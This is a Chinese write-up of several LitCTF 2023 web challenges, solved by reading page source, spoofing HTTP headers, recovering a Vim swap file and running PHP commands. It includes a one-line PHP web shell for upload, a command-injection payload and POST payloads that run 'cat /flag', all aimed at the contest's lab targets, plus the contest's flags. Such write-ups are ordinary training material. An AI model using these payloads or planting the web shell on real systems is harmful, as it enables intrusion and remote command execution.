【2023】LitCTF

LitCTF2023(复现)

Web:

1、我Flag呢?

​ ctrl+u 读取源码,在最后发现了flag:

<!--flag is here flag=NSSCTF{3d5218b9-4e24-4d61-9c15-68f8789e8c48} -->

2、PHP是世界上最好的语言!!

在这里插入图片描述

​ 右边那个框下面是 RUN CODE ,结合题目是PHP,推测为RCE,先输入echo 123;看看会发生啥:发现左边输出内容出现了123,那么,直接system(“cat /flag”);成功拿到flag:flag=NSSCTF{b26d3851-52f5-4a80-9e69-6417baf49d68}

3、导弹迷踪

​ js游戏题,先看源码,这里看game.js:

MG.game = (function () {/** Constants **/var GameState = {WAIT_START: 'wait_start',STARTING:   'starting',RUNNING:    'running',FINISHED:   'finished',CRASHED:    'crashed'}var STARTING_LIVES = 5;var LEVEL_NUM_BARRIERS = 20;/** Variables **/var mState = GameState.WAIT_START;var mLives = STARTING_LIVES;var mLevel = 0;var mRemainingBarriers = 0;var mBarriersToPass = 0;var mProgress = 0.0;var mBestProgress = 0.0;/* Strings for UI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/var getLevelString = function () {return mLevel ? 'LEVEL ' + mLevel : 'QUALIFYING LEVEL';}var Messages = {START: {title: getLevelString,text:  function () {return 'CLICK TO BEGIN';}},CRASH: {title: function () {return 'CRASHED';},text:  function () {return 'CLICK TO RETRY';}},GAME_OVER: {title: function () {return 'GAME OVER';},text:  function () {return 'CLICK TO START AGAIN';}},FINISH: {title: function () {return 'LEVEL COMPLETED';},text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},}};var getLevelStartVelocity   = function (level) {return 300 + 100*level;}var getLevelFinishVelocity  = function (level) {return 400 + 100*level;}var getPreLevelIdleVelocity = function (level) {return 350 + 100*level;}var getPostLevelIdleVelocity = function (level) {return 550 + 100*level;}var playCrashAnimation = function () {// TODO move drawing out of the update loop// create a copy of the explosion elementvar explosion = document.getElementById('explosion');// play the animationexplosion.firstChild.beginElement();explosion.setAttribute('visibility', 'visible');// TODO can't seem to get a callback to fire when the animation// finishes. Use timeout insteadsetTimeout(function (){var explosion = document.getElementById('explosion');explosion.setAttribute('visibility', 'hidden');}, 400);}var goWaitStartLevel = function () {MG.banner.show(Messages.START.title(), Messages.START.text());MG.util.showMouse();MG.missile.setAutopilot();MG.missile.setVelocity(getPreLevelIdleVelocity(mLevel));if (mLevel === 0) {mLives = Infinity;}mState = GameState.WAIT_START;}/****/var goRun = function () {MG.banner.hide();MG.util.hideMouse();/* TODO should the start barrier be pushed here?If so, should all of the barriers for the entire level be pushed as well? */mRemainingBarriers = LEVEL_NUM_BARRIERS;MG.barrierQueue.pushBarrier(MG.BarrierType.START);mBarriersToPass = LEVEL_NUM_BARRIERS;MG.missile.setManual();mState = GameState.STARTING;}var goFinish = function () {MG.banner.show(Messages.FINISH.title(), Messages.FINISH.text());MG.util.showMouse();MG.missile.setAutopilot();MG.missile.setVelocity(getPostLevelIdleVelocity(mLevel));mState = GameState.FINISHED;}var goCrash = function () {MG.util.showMouse();if (mLives === 0) {MG.banner.show(Messages.GAME_OVER.title(), Messages.GAME_OVER.text());} else {MG.banner.show(Messages.CRASH.title(), Messages.CRASH.text());}playCrashAnimation()mState = GameState.CRASHED;}//==========================================================================return {init: function () {var rootNode = document.getElementById('tunnel');MG.missile.init();//var wallNode;wallNode = document.createElementNS(NAMESPACE_SVG, 'g');wallNode.setAttribute('transform', 'scale(1,-1)');MG.tunnelWall.init(wallNode);rootNode.appendChild(wallNode);//var barrierQueueNode;barrierQueueNode = document.createElementNS(NAMESPACE_SVG, 'g');barrierQueueNode.setAttribute('transform', 'scale(1,-1)');MG.barrierQueue.init(barrierQueueNode);rootNode.appendChild(barrierQueueNode);//goWaitStartLevel();rootNode.setAttribute('visibility', 'visible');},update: function (dt) {MG.missile.update(dt);    MG.tunnelWall.update(dt);MG.barrierQueue.update(dt);    /* check whether the nearest barrier has been reached and whether the missile collides with it. */if (!MG.barrierQueue.isEmpty()) {if (MG.missile.getOffset() < MG.MISSILE_LENGTH && !MG.missile.isCrashed()){var barrier = MG.barrierQueue.nextBarrier();if (barrier.collides(MG.missile.getPosition().x, MG.missile.getPosition().y)) {// CRASHMG.missile.onCrash();goCrash();} else {// BARRIER PASSEDMG.barrierQueue.popBarrier();MG.missile.onBarrierPassed();// TODO this block makes loads of assumptions about stateif (mState === GameState.RUNNING|| mState === GameState.STARTING) {switch(barrier.getType()) {case MG.BarrierType.FINISH:goFinish();break;case MG.BarrierType.BLANK:break;case MG.BarrierType.START:mState = GameState.RUNNING;// FALLTHROUGHdefault:mBarriersToPass--;var startVelocity = getLevelStartVelocity(mLevel);var finishVelocity = getLevelFinishVelocity(mLevel);MG.missile.setVelocity(startVelocity+ (startVelocity - finishVelocity)* (mBarriersToPass - LEVEL_NUM_BARRIERS)/ LEVEL_NUM_BARRIERS);break;}}}}    }/* Pad the barrier queue with blank barriers so that there are barriersas far as can be seen. */while (MG.barrierQueue.numBarriers() < MG.LINE_OF_SIGHT/MG.BARRIER_SPACING) {var type = MG.BarrierType.BLANK;if (mState === GameState.RUNNING|| mState === GameState.STARTING) {mRemainingBarriers--;if (mRemainingBarriers > 0) {type = MG.BarrierType.RANDOM;} else if (mRemainingBarriers === 0) {type = MG.BarrierType.FINISH;} else {type = MG.BarrierType.BLANK;}}MG.barrierQueue.pushBarrier(type);}/* Update progress */switch (mState) {case GameState.RUNNING:mProgress = 1 - (mBarriersToPass*MG.BARRIER_SPACING + MG.missile.getOffset())/(LEVEL_NUM_BARRIERS * MG.BARRIER_SPACING);mBestProgress = Math.max(mProgress, mBestProgress);break;case GameState.FINISHED:mProgress = 1;mBestProgress = 1;break;case GameState.STARTING:mProgress = 0;break;default:break;}},updateDOM: function () {var position = MG.missile.getPosition();var offset = MG.missile.getOffset();MG.barrierQueue.updateDOM(-position.x, -position.y, offset);MG.tunnelWall.updateDOM(-position.x, -position.y, offset);},onMouseMove: function (x, y) {var windowWidth = window.innerWidth;var windowHeight = window.innerHeight;MG.missile.setTarget(x - 0.5*windowWidth, -(y - 0.5*windowHeight));},onMouseClick: function () {if (MG.banner.isFullyVisible()) {switch (mState) {case GameState.WAIT_START:goRun();break;case GameState.FINISHED:/* The player is given an infinite number of livesduring the qualifying level but these should beremoved before continuing. */if (mLevel === 0) {mLives = STARTING_LIVES;}mLevel++;mBestProgress = 0.0;goWaitStartLevel();break;case GameState.CRASHED:MG.banner.hide();MG.fog.fadeIn(function() {if (mLives === 0) {mLevel = 0;mLives = STARTING_LIVES;mBestProgress = 0.0;} else {mLives--;}MG.missile.reset();MG.barrierQueue.reset();MG.fog.fadeOut();goWaitStartLevel();});break;}}},/* Returns an integer representing the current level */getLevel: function () {return mLevel;},/* Returns a human readable string describing the current level */getLevelString: getLevelString,/* Returns the number of times the player can crash before game over. *//* If the player crashes with zero lives remaining the game ends */getNumLives: function () {return mLives;},/* Returns the progress through the level as a value between 0 and 1,where 0 is not yet started and 1 is completed. */getProgress: function () {return mProgress;       },getBestProgress: function () {return mBestProgress;}};}());

​ 然后发现重要代码:

text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},

​ 成功获得flag:{y0u_w1n_th1s_!!!}

4、Follow me and hack me

​ 直接hackbar传参GET:?CTF=Lit2023 POST:Challenge=i’m_c0m1ng

5、Ping:

​ 尝试ping一下127.0.0.1能通,之后尝试 ;ls 发现不行,被限制了,不过,查看网页源代码发现是前端过滤,禁用js之后就能过了,无脑 ;cat /flag拿到flag: flag=NSSCTF{1a6530af-202d-463c-b4ea-c0447db5b801}

6、1zjs:

​ 这个1z真的1点也不Ez (>_<)

​ 第一件事儿查看源码,发现文件./dist/index.umd.js

​ 在这个文件的注释中找到了一个文件:f@k3f1ag.php

​ 之后访问这个文件:

(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+[]]+[]+[+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

​ 把这个编码过后的东西扔到控制台中,拿到flag:“NSSCTF{0f7f6477-a502-49b1-b7fe-01b2439ab608}”

7、作业管理系统

​ 先看源码,源码最后注释里说了默认的账号和密码都是admin,直接登陆:

​ 之后我不复现了,学校校园网卡我PHP马。

​ 大致说下后续咋做:直接上传php文件,内容是:

<?php system($_POST['cmd']);?>

​ 上传成功后直接读取该文件,然后post传入一个cat /flag即可。

8、Http pro max plus

​ 这题…难蚌。

​ 先是一堆请求头绕过,直接上:

User-Agent: Chrome
Client-Ip:127.0.0.1
via:Clash.win
referer: pornhub.com

​ 之后提示访问 /wtfwtfwtfwtf.php文件

​ 访问了之后看源码又要访问/sejishikong.php文件,之后得到flag:

冲完啦?拿上你的flag赶紧走NSSCTF{714b395b-2dfd-4657-8b5b-c82d04fad401}

9、Vim yyds:

​ 访问 /.index.php.swp之后通过vim -r index.php.swp获取源码(vim泄露):

<html><head><meta charset="UTF-8"><style type="text/css">body,html {display: flex;align-items: center;justify-content: center;}div.vim {display: flex;align-content: center;vertical-align: middle;justify-content: center;}img {border: none;width: 8rem;height: auto;}h1.vim_yyds {color: #50f728;display: flex;align-items: flex-start;justify-content: center;margin-top: 50;margin-left: 5px;}h3.vim_said {color: #39c2ff;display: flex;justify-content: center;align-items: center;}br,p {font-size: 20;}</style>
</head><body><main><div class="vim"><img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img><h1 class="vim_yyds">Vim yyds</h1></div><h3 class="vim_said">队里师傅说Vim是世界上最好的编辑器,不接受反驳</h3><div class="can_can_vim"><?phperror_reporting(0);$password = "Give_Me_Your_Flag";echo "<p>can can need Vim </p>";if ($_POST['password'] === base65_encode($password)) {echo "<p>Oh You got my password!</p>";eval(system($_POST['cmd']));}?></div></main>
</body>

​ 注意这儿:

<?phperror_reporting(0);$password = "Give_Me_Your_Flag";echo "<p>can can need Vim </p>";if ($_POST['password'] === base65_encode($password)) {echo "<p>Oh You got my password!</p>";eval(system($_POST['cmd']));}?>

​ 把Give_Me_Your_Flag进行base64编码之后得到:R2l2ZV9NZV9Zb3VyX0ZsYWc=,之后POST传入,然后进行rce,payload如下:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

​ flag:NSSCTF{550f422b-6b60-4216-828a-4521b82fe56f}

10、这是什么?SQL !注一下 !

